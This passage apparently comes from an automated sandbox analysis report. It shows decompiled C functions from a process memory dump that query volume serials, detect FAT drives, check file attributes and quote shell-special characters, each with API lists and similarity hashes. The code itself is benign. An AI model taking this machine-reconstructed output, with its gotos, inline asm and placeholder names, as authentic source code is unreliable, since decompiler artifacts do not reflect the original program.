				if(E00164C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E00160CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E00177C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E00177C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E0016274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E00177C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E0015C5A2(_t133);
						goto L48;
					}
				}
			}









































                                  0x0017a834
                                  0x0017a83f
                                  0x0017a846
                                  0x0017a851
                                  0x0017a858
                                  0x0017a85a
                                  0x0017a862
                                  0x0017a86e
                                  0x0017a871
                                  0x0017a873
                                  0x0017a879
                                  0x0017a881
                                  0x0017a88c
                                  0x0017a892
                                  0x0017a8a1
                                  0x0017a8a9
                                  0x0017a8b4
                                  0x0017a8ba
                                  0x0017a8c9
                                  0x0017a8d0
                                  0x0017a8f5
                                  0x0017ab2f
                                  0x0017ab2f
                                  0x0017ab30
                                  0x0017ab32
                                  0x0017ab39
                                  0x0017ab3b
                                  0x0017ab3b
                                  0x0017ab3d
                                  0x0017ab3d
                                  0x0017ab3f
                                  0x0017ab45
                                  0x0017ab52
                                  0x0017ab5f
                                  0x0017ab78
                                  0x0017ab78
                                  0x0017a8fd
                                  0x0017a91f
                                  0x00000000
                                  0x00000000
                                  0x0017a927
                                  0x0017a949
                                  0x00000000
                                  0x00000000
                                  0x0017a956
                                  0x0017a95b
                                  0x0017a961
                                  0x0017a965
                                  0x0017a967
                                  0x0017a967
                                  0x0017a96d
                                  0x0017a970
                                  0x0017a970
                                  0x0017a973
                                  0x0017a976
                                  0x0017a97b
                                  0x0017a983
                                  0x0017a987
                                  0x0017a989
                                  0x0017a989
                                  0x0017a991
                                  0x0017a993
                                  0x0017a993
                                  0x0017a99f
                                  0x0017a9a8
                                  0x00000000
                                  0x0017a9ae
                                  0x0017a9b9
                                  0x0017a9be
                                  0x0017a9c6
                                  0x0017a9c8
                                  0x0017a9c8
                                  0x0017a9ce
                                  0x0017a9d6
                                  0x0017a9d8
                                  0x0017a9d8
                                  0x0017a9e2
                                  0x0017a9f9
                                  0x0017aa20
                                  0x0017aa26
                                  0x0017aa2a
                                  0x0017aa2c
                                  0x0017aa2c
                                  0x0017aa36
                                  0x0017aa59
                                  0x0017aa5b
                                  0x0017aa5b
                                  0x0017aa63
                                  0x00000000
                                  0x0017aa38
                                  0x0017aa3a
                                  0x0017aa3c
                                  0x0017aa3c
                                  0x0017aa42
                                  0x0017aa4b
                                  0x0017aa46
                                  0x0017aa48
                                  0x0017aa48
                                  0x0017aa52
                                  0x0017aa67
                                  0x0017aa67
                                  0x0017aa6d
                                  0x0017aa71
                                  0x0017aa73
                                  0x0017aa73
                                  0x0017aa7c
                                  0x0017aab2
                                  0x0017aaba
                                  0x0017aabc
                                  0x0017aabc
                                  0x0017aac2
                                  0x0017aad0
                                  0x0017aa7e
                                  0x0017aa80
                                  0x0017aa82
                                  0x0017aa82
                                  0x0017aa88
                                  0x0017aa90
                                  0x0017aa92
                                  0x0017aa92
                                  0x0017aa98
                                  0x0017aa9e
                                  0x0017aaa8
                                  0x0017aaad
                                  0x0017aad8
                                  0x0017aadc
                                  0x0017aade
                                  0x0017aae6
                                  0x0017aaf3
                                  0x0017ab0d
                                  0x0017ab2b
                                  0x0017ab2b
                                  0x0017aae6
                                  0x00000000
                                  0x0017aadc
                                  0x0017a9fb
                                  0x0017aa06
                                  0x00000000
                                  0x00000000
                                  0x0017aa0c
                                  0x0017aa13
                                  0x0017aa14
                                  0x00000000
                                  0x0017aa1a
                                  0x0017a9f9

                                  APIs
                                  • memset.MSVCRT ref: 0017A879
                                  • memset.MSVCRT ref: 0017A8A1
                                  • memset.MSVCRT ref: 0017A8C9
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,001521E8,?,?,?,-00000105,-00000105,-00000105), ref: 0017A9F1
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 0017A9FB
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 0017AA0D
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017AB45
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017AB52
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017AB5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$ErrorLast$InformationVolume
                                  • String ID: %04X-%04X
                                  • API String ID: 2748242238-1126166780
                                  • Opcode ID: be5330bcdeb945b82e7ac6721378ad94144744c6eee680dd65a169ab26458964
                                  • Instruction ID: 3a259359e7123c337f2ebb4e611fc6c4964339283944e2d6559fd846d3e8a5b6
                                  • Opcode Fuzzy Hash: be5330bcdeb945b82e7ac6721378ad94144744c6eee680dd65a169ab26458964
                                  • Instruction Fuzzy Hash: 2891B2B2A012289ADB24DB64CC85AEE77B9EF94354F8440D9F50DE3140EB309F94CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00163121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E00163121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E00160C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00160C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00160C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0x193cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0x193cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E00164C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E00160D89(_t109, _t81);
						E00160CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0x193cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E00166FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}






























                                  0x00163121
                                  0x0016312c
                                  0x00163133
                                  0x0016313e
                                  0x00163146
                                  0x00163148
                                  0x00163154
                                  0x0016315c
                                  0x0016315e
                                  0x00163160
                                  0x00163168
                                  0x00163170
                                  0x00163174
                                  0x00163180
                                  0x00163188
                                  0x00163193
                                  0x0016319a
                                  0x001631a9
                                  0x001631d5
                                  0x0016dbf0
                                  0x0016dbfa
                                  0x00000000
                                  0x00163229
                                  0x00163229
                                  0x0016322f
                                  0x00163237
                                  0x00163239
                                  0x00163239
                                  0x00163245
                                  0x00163251
                                  0x00163257
                                  0x0016325f
                                  0x00163261
                                  0x00163261
                                  0x0016326e
                                  0x0016327e
                                  0x00163283
                                  0x0016328b
                                  0x0016dbb6
                                  0x0016dbb6
                                  0x00163291
                                  0x00163296
                                  0x00163310
                                  0x00163310
                                  0x001632b3
                                  0x0016dbd3
                                  0x0016dbd9
                                  0x0016dbe1
                                  0x0016dbe5
                                  0x001632b9
                                  0x001632b9
                                  0x001632c1
                                  0x00163318
                                  0x00163318
                                  0x001632c9
                                  0x001632d3
                                  0x0016dbc8
                                  0x0016dbd0
                                  0x0016dbfc
                                  0x0016dbfc
                                  0x0016dbfc
                                  0x0016dbc8
                                  0x001632d3
                                  0x001632b3
                                  0x00163251
                                  0x001632df
                                  0x001632e9
                                  0x001632f6
                                  0x0016330f

                                  APIs
                                  • memset.MSVCRT ref: 00163160
                                  • memset.MSVCRT ref: 00163180
                                  • memset.MSVCRT ref: 001631A9
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,001521E8,?,?,?,-00000105,-00000105,-00000105), ref: 001632AB
                                  • _wcsicmp.MSVCRT ref: 001632C9
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001632DF
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001632E9
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001632F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$InformationVolume_wcsicmp
                                  • String ID: FAT
                                  • API String ID: 4247940253-238207945
                                  • Opcode ID: da34497dff87e60b53d1516b03449db887b315c273b92b89237b863a5267d95c
                                  • Instruction ID: c99a39879af50c29e442c2d03ea64bdc306eefa0a644042bdd544a28905f33e6
                                  • Opcode Fuzzy Hash: da34497dff87e60b53d1516b03449db887b315c273b92b89237b863a5267d95c
                                  • Instruction Fuzzy Hash: B65172B2E002189BDB14CBA4DC99BEE77B8EB15344F0401EEE519E3151EB359FA4CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015AD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0015AD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E00166FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E00160C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E001622C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E001668BA(E00166A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E0015CD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}






































                                  0x0015ad4c
                                  0x0015ad52
                                  0x0015ad59
                                  0x0015ad60
                                  0x0015ad62
                                  0x0015ad64
                                  0x0015ad6b
                                  0x0015aeac
                                  0x0015ae71
                                  0x0015ae78
                                  0x0015ae79
                                  0x0015ae7a
                                  0x0015ae85
                                  0x0015ae85
                                  0x0015ad76
                                  0x0015ad7f
                                  0x0015ad81
                                  0x0015ad8c
                                  0x0015ad95
                                  0x0015ada0
                                  0x0015adc0
                                  0x0015ae61
                                  0x0015ae68
                                  0x0015ae6f
                                  0x00000000
                                  0x0015ae6f
                                  0x0015adc6
                                  0x0015adcf
                                  0x0017122a
                                  0x0017122a
                                  0x0015adf0
                                  0x0015adf4
                                  0x0015ae5f
                                  0x0015ae5f
                                  0x00000000
                                  0x0015adf6
                                  0x0015adf6
                                  0x0015adff
                                  0x00171233
                                  0x00171233
                                  0x0015ae0d
                                  0x0015ae13
                                  0x0015ae18
                                  0x0017123c
                                  0x00171240
                                  0x00171245
                                  0x00171249
                                  0x0017124f
                                  0x00171257
                                  0x00171276
                                  0x0017125d
                                  0x00171263
                                  0x00171266
                                  0x00171270
                                  0x00171270
                                  0x0017127f
                                  0x00171285
                                  0x00171285
                                  0x00000000
                                  0x0015ae1e
                                  0x0015ae1e
                                  0x0015ae24
                                  0x001712b0
                                  0x0015ae33
                                  0x0015ae37
                                  0x0015ae53
                                  0x0015ae56
                                  0x0015ae5d
                                  0x0015ae86
                                  0x0015ae8c
                                  0x0015ae90
                                  0x00171296
                                  0x0017129e
                                  0x0017129e
                                  0x00171296
                                  0x0015ae90
                                  0x0015ae5d
                                  0x00000000
                                  0x0015ae24
                                  0x0015ae18

                                  APIs
                                  • memset.MSVCRT ref: 0015AD95
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 0015ADEA
                                  • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 0015AE0D
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015AE68
                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 0017128D
                                    • Part of subcall function 001622C0: wcschr.MSVCRT ref: 001622CC
                                  • wcsstr.MSVCRT ref: 00171249
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00171266
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001712A5
                                    • Part of subcall function 001668BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,00166A00,00166A00,?,0015AE4F,00000037,00000000,?), ref: 001668E6
                                    • Part of subcall function 0015CD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00179362,00000000,00000000,?,00169814,00000000), ref: 0015CD55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                  • String ID: \\.\
                                  • API String ID: 52035941-2900601889
                                  • Opcode ID: ca7ce535dac85801ae492d0e16be874333626d3766a366ba0121292d4447a005
                                  • Instruction ID: db4c23ba925883bee84b75ae9e5a3cf1fde47ef2840374b73130ef5878a82bff
                                  • Opcode Fuzzy Hash: ca7ce535dac85801ae492d0e16be874333626d3766a366ba0121292d4447a005
                                  • Instruction Fuzzy Hash: 2841D471548301EBD7209F689C8596F77E8EF88711F544A1EFCA9C7191EB30D948C6A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017AEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0017AEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E0017B4DD(0);
				_t157 = 0x2c;
				_t191 = E001600B0(_t157);
				if(_t191 == 0) {
					E00179287(_t157);
					__imp__longjmp(0x18b8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E0015CB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E00163B5D(_t159,  &_v124) == 1) {
					L57:
					E00165D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E00164800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E00165590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E00179C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0x19853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0x19853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0x19853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E00160040(_t154[0xc]);
								E00160040(_t154[2]);
								E00160040(_t154);
								E00165D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E00166FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}













































































                                  0x0017aef0
                                  0x0017aef7
                                  0x0017aefd
                                  0x0017aeff
                                  0x0017af08
                                  0x0017af10
                                  0x0017af15
                                  0x0017af19
                                  0x0017af1c
                                  0x0017af1f
                                  0x0017af22
                                  0x0017af25
                                  0x0017af28
                                  0x0017af2b
                                  0x0017af2e
                                  0x0017af31
                                  0x0017af34
                                  0x0017af37
                                  0x0017af3a
                                  0x0017af3d
                                  0x0017af43
                                  0x0017af44
                                  0x0017af45
                                  0x0017af46
                                  0x0017af4a
                                  0x0017af50
                                  0x0017af53
                                  0x0017af56
                                  0x0017af59
                                  0x0017af5c
                                  0x0017af5f
                                  0x0017af62
                                  0x0017af63
                                  0x0017af64
                                  0x0017af65
                                  0x0017af6c
                                  0x0017af72
                                  0x0017af76
                                  0x0017af78
                                  0x0017af84
                                  0x0017af84
                                  0x0017af8d
                                  0x0017af92
                                  0x0017af9b
                                  0x0017af9d
                                  0x0017afa0
                                  0x0017afa5
                                  0x0017afaa
                                  0x0017b2a5
                                  0x0017b2a5
                                  0x0017b2aa
                                  0x0017afbe
                                  0x0017afc1
                                  0x0017afd1
                                  0x00000000
                                  0x0017afd7
                                  0x0017afd9
                                  0x0017afe3
                                  0x0017afe8
                                  0x0017afef
                                  0x00000000
                                  0x0017aff5
                                  0x0017aff8
                                  0x0017b007
                                  0x0017b00d
                                  0x0017b00d
                                  0x0017b012
                                  0x0017b015
                                  0x0017b019
                                  0x0017b01c
